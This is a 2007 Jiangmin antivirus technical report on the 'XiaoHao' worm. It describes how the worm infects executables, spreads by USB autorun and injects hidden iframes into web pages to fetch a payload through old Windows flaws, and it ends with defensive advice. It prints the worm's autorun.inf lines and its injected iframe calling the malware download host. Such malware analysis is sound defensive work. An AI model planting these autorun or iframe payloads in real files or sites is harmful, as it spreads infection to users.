破坏力超“熊猫烧香” 江民发布“小浩”蠕虫技术报告
2007-08-15 17:41
239 查看
破坏力超“熊猫烧香” 江民发布“小浩”蠕虫技术报告 | |||
2007-8-14 16:44:44 www.jiangmin.com 消息出自: 江民科技 | |||
江民反病毒专家分析该病毒详细技术特征如下: 病毒名称:Worm/XiaoHao.a 中 文 名:小浩蠕虫 病毒类型:蠕虫 危害等级:★★★★ 影响平台:Win 9X/ME/NT/2000/XP/2003 病毒运行特征: Worm/XiaoHao.a 蠕虫采用Visual C++6.0 工具编写,并经过UPX工具加壳处理,病毒运行后,会在每个硬盘根目录下释放病毒文件: c:/xiaohao.exe, 402706字节 c:/autorun.inf, 91字节 其中xiaohao.exe 文件为病毒主体,该文件运行后搜索全盘扩展名为*.exe 的文件,将自身病毒体写入到正常文件中,从而使原文件成为新的病毒体,被感染后的文件图标为一个表示有“浩”字的图标,当浏览含有被感染病毒文件的窗口时,窗口的标题栏会有已中毒 X14o-H4o's Virus 的字样。 如下图: 由于该病毒采用的是覆盖式写入,因此被感染后的文件无法恢复。 该病毒进程还会创建iexplore.exe 子进程,利用多个系统漏洞下载木马病毒。 另外,病毒还在各个硬盘跟目录下释放的autorun.inf 文件是病毒主体的伴生文件,该文件内容如下: [Autorun] open=Xiaohao.exe shellexecute=Xiaohao.exe shell/Auto/command=Xiaohao.exe 这样,该病毒就可以利用Windows系统的自动播放功能借助与U盘来传播,当用户在不知情的情况下,双击已感染该病毒的U盘时,就会将病毒传播到新的系统中。 该病毒还会搜索全盘中扩展名为*.htm、*.html、*.asp、*.aspx、*.php、*.jsp 的网页脚本文件,向其中插入恶意网址连接<iframe src=http://xiaohao.yona.biz/***.htm width=0 height=0></iframe>,该病毒网址会利用MS06-014、MS06-046、MS07-017 等多个系统漏洞下载并且执行病毒文件http://xiaohao.yona.biz/***.exe ,该文件为病毒体自身。 该病毒会将系统时间修改为2005年1月17日,使一些杀毒软件的使用授权失效,病毒还会模拟鼠标操作,企图绕过杀毒软件的主动防御功能。 该病毒会将其他未被感染的文件设置成隐藏属性,还会生成文件:c:/Jilu.txt,用以记录被感染的文件和被隐藏的文件。该病毒还会破坏注册表相关键值,使其不能显示隐藏文件,严重影响了电脑的正常使用。 据悉,该病毒作者还将病毒源代码公开在互联网中,并且还留下了自己的QQ号和博客地址,称“欢迎各位大牛. 来指导我 或者是交流” ,具有明显的技术炫耀性。 针对此病毒,江民科技已经紧急升级了病毒库,只要升级到8月14日的病毒库,即可拦截此病毒的入侵。 江民反病毒专家建议广大用户: 1. 安装KV2007的杀毒软件,开启每天定时升级病毒库,定时杀毒功能,并开启所有的监控功能。 2. 禁用系统的自动播放功能,防止病毒从U盘、移动硬盘、MP3等移动存储设备进入到计算机。 禁用Windows 系统的自动播放功能的方法:在运行中输入 gpedit.msc 后回车,打开组策略编辑器,依次点击:计算机配置->管理模板->系统->关闭自动播放->已启用->所有驱动器->确定。 3. 利用Windows Update功能打全系统补丁,避免病毒从网页木马的方式入侵到系统中。 |
相关文章推荐
- 中国互联网技术联盟发布首个“互联网+”企业评测报告
- NIST发布区块链报告,为行业新人解释技术
- 江民公布“密码7005”最新变种技术报告
- 江民“网页收割者”病毒技术分析报告
- 【一周时讯技评】苹果技术顾问私自窃取用户信息并恐吓威胁|CNCERT发布《2017年我国联网智能设备安全情况报告》
- 腾讯技术工程 | 腾讯大数据发布2017第三季度移动行业数据报告
- 美国家标准技术研究院发布区块链技术报告
- 英国政府发布区块链技术重要报告,…
- 瑞星发布“MSN骗子”病毒技术分析报告
- WebUI Studio.NET® 2007 R1 用户界面套装新版本发布,全面支持AJAX技术
- 新闻发布系统技术总结(一)Cookies and Session
- 江民杀毒软件发展史(以发布版本为时间轴)
- 金山毒霸技术预览版1.0 beta【云沙箱 三引擎】发布(毒霸体验团队可优先测试)
- WCF技术剖析之二十七: 如何将一个服务发布成WSDL[基于WS-MEX的实现](提供模拟程序)
- 剑桥的技术报告列表
- 万能数据库查询分析器 6.01发布,本人为之撰写的相关技术文章达69篇
- JAVA_WEB项目(结合Servlet+jsp+ckEditor编辑器+jquery easyui技术)实现新闻发布管理系统第一篇:前期环境准备
- GNOME桌面牵手网页技术,SeedKit首度发布
- 牛腩新闻发布系统——后台前台整合技术
- 服务端技术进阶(一)web项目的部署(发布)流程